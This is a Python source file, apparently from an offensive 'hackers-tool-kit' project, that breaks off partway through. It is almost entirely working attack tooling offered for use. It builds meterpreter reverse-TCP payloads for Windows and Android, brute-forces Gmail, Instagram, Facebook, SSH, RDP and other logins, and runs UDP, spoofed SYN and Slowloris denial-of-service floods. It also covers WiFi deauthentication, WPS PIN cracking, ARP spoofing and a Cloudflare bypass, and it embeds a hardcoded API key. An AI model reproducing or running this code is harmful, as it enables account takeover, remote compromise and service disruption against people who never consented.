BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + print "\033[1m\033[33m\nMODES>: [0] fastest, [1] fast, [2] slow, [3] slowest\033[0m\n" + k = raw_input("MODE> ") + ma = 'python3 /root/hackers-tool-kit/tools/Instagram/instagram.py {0} {1} -m {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +#------------------# +#INFO SCAN HOST END# + + +#SPEC INFO SCAN START# +#--------------------# +def specscan(): + print """\033[1m +Scans Available:\033[0m + +1: simple nmap portscan + +2: show document info of target with curl + +3: nmap OS detection, version detection, script scanning, and traceroute scan + +4: nmap dns bruteforce + +5: get a hosts ip address + +6: check if a host is online + +7: who-is lookup + +8: dns-lookup + +9: get a hosts source code + +10: web application firewall scanner + +11: run a ssl scan + +12: find the location of a ip address + +13: reverse ip lookup + +14: host search + +15: reverse dns + +16: find shared dns + +17: cloudflare bypass + +18: sslscan + +19: directory scan / bruteforce + +20: nikto scan [this might take awhile to finish] + +go back: go back to main menu + + """ + print "Type a number then your target Ex: 5 www.pornhub.com\n" + j = False + while not j: + try: + option, target = raw_input("\033[1mScan:\033[0m ").split() + if option == "1": + os.system("nmap {0}".format(target)) + if option == "2": + os.system("curl -I {0}".format(target)) + if option == "3": + os.system("nmap -A {0}".format(target)) + if option == "4": + os.system("nmap --script dns-brute {0}".format(target)) + if option == "5": + ip = socket.gethostbyname(target) + print """ + Host: {0} + IP: {1} + """.format(target, ip) + if option == "6": + ht = raw_input("\033[1mHTTP or HTTPS:\033[0m ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + request = requests.get(targetht + target) + http = request.status_code + if http == 200: + print("\nServer: [\033[32monline\033[0m]") + else: + print("\nServer: [\033[31moffline\033[0m]") + if option == "7": + whois = requests.get("https://api.hackertarget.com/whois/?q=" + target).content.decode("UTF-8") + print(whois) + if option == "8": + os.system("curl https://api.hackertarget.com/dnslookup/?q={0}".format(target)) + if option == "9": + os.system("curl {0}".format(target)) + if option == "10": + os.system("wafw00f {0}".format(target)) + if option == "11": + os.system("sslscan {0}".format(target)) + if option == "12": + os.system("curl https://api.hackertarget.com/geoip/?q={0}".format(target)) + if option == "13": + os.system("curl https://api.hackertarget.com/reverseiplookup/?q={0}".format(target)) + if option == "14": + os.system("curl https://api.hackertarget.com/hostsearch/?q={0}".format(target)) + if option == "15": + os.system("curl https://api.hackertarget.com/reversedns/?q={0}".format(target)) + if option == "16": + os.system("curl https://api.hackertarget.com/findshareddns/?q={0}".format(target)) + if option == "17": + def daf(): + subdomainlist = ["ftp", "cpanel", "webmail", "localhost", "local", "mysql", "forum", "driect-connect", "blog", + "vb", "forums", "home", "direct", "forums", "mail", "access", "admin", "administrator", + "email", "downloads", "ssh", "owa", "bbs", "webmin", "paralel", "parallels", "www0", "www", + "www1", "www2", "www3", "www4", "www5", "shop", "api", "blogs", "test", "mx1", "cdn", "mysql", + "mail1", "secure", "server", "ns1", "ns2", "smtp", "vpn", "m", "mail2", "postal", "support", + "web", "dev"] + + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(target) + showip = socket.gethostbyname(str(hosts)) + print "\033[0m\033[32mHIT\033[0m:\033[1m " + str(showip) + ' | ' + str(hosts) + except: + print "\033[0mBypassing..." + + daf() + if option == "18": + a = 'sslscan {0}'.format(target) + os.system(a) + if option == "19": + ht = raw_input("HTTP or HTTPS: ") + if ht == "https": + targetht = "https://" + if ht == "http": + targetht = "http://" + a = 'dirb {0}{1}/'.format(targetht,target) + os.system(a) + if option == "20": + port = raw_input("\033[1mPort:\033[0m ") + os.system("nikto -h {0} -p {1}".format(target,port)) + if target == "back": + break + except: + print "\n" + break + j = True +#------------------# +#SPEC INFO SCAN END# + + +#INFO ON YOUR SYSTEM START# +#-------------------------# +def sysinfo(): + os.system("iwconfig") + k = raw_input("Interface: ") + os.system("clear") + os.system("ifconfig") + print "\n" + os.system("iwconfig") + print "\n" + os.system("neofetch") + print "\n" + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" + print "\n" + show = 'macchanger -s {0}'.format(k) + os.system(show) +#-----------------------# +#INFO ON YOUR SYSTEM END# + + +#ALL METASPLOIT EXPLOITS START# +#-----------------------------# +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +#---------------------------# +#ALL METASPLOIT EXPLOITS END# + + +#UDP DOS START# +#-------------# +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +#-----------# +#UDP DOS END# + +#TCP FLOOD START# +#---------------# +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +#-------------# +#TCP FLOOD END# + + +#SYN FLOOD START# +#---------------# +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() +#-------------# +#SYN FLOOD END# + + +#PING A HOST START# +#-----------------# +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +#---------------# +#PING A HOST END# + + +#ALL METASPLOIT PAYLOADS START# +#-----------------------------# +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +#---------------------------# +#ALL METASPLOIT PAYLOADS END# + + +#ALL METASPLOIT AUX START# +#------------------------# +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +#----------------------# +#ALL METASPLOIT AUX END# + + +#START METASPLOIT HANDLER START# +#------------------------------# +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +#----------------------------# +#START METASPLOIT HANDLER END# + + +#ALL METASPLOIT MODS START# +#-------------------------# +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +#-----------------------# +#ALL METASPLOIT MODS END# + + +#HYDRA AUTOMATED START# +#---------------------# +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +#-------------------# +#HYDRA AUTOMATED END# + + +#WORDLIST MAKER START# +#--------------------# +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +#------------------# +#WORDLIST MAKER END# + + +#LIST FILES START# +#----------------# +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" +#--------------# +#LIST FILES END# + + +#MONITOR MODE OFF START# +#----------------------# +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +#--------------------# +#MONITOR MODE OFF END# + + +#TURN ON VPN START# +#-----------------# +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +#---------------# +#TURN ON VPN END# + + +#TURN OFF VPN START# +#------------------# +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +#----------------# +#TURN OFF VPN END# + + +#SLOW LORIS DOS START# +#--------------------# +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') +#------------------# +#SLOW LORIS DOS END# + + +#OPEN DOX WEBSITE START# +#----------------------# +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +#--------------------# +#OPEN DOX WEBSITE END# + + +#SCAN SPECIFIC NET START# +#-----------------------# +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +#---------------------# +#SCAN SPECIFIC NET END# + + +#DEFAULT WIFI PIN START# +#----------------------# +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +#--------------------# +#DEFAULT WIFI PIN END# + + +#WIFI PIN BRUTEFORCE START# +#-------------------------# +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +#-----------------------# +#WIFI PIN BRUTEFORCE END# + + +#DEAUTH ATTACK START# +#-------------------# +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +#-----------------# +#DEAUTH ATTACK END# + + +#MAC CHANGER START# +#-----------------# +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-----------------# +#MAC CHANGER START# + + +#MAC CHANGER OFF START# +#---------------------# +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +#-------------------# +#MAC CHANGER OFF END# + + +#ARP SPOOF START# +#---------------# +def arpspoof(): + print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" + h = raw_input("Targets: ") + os.system('echo "net.sniff on\n" >> arp.cap') + 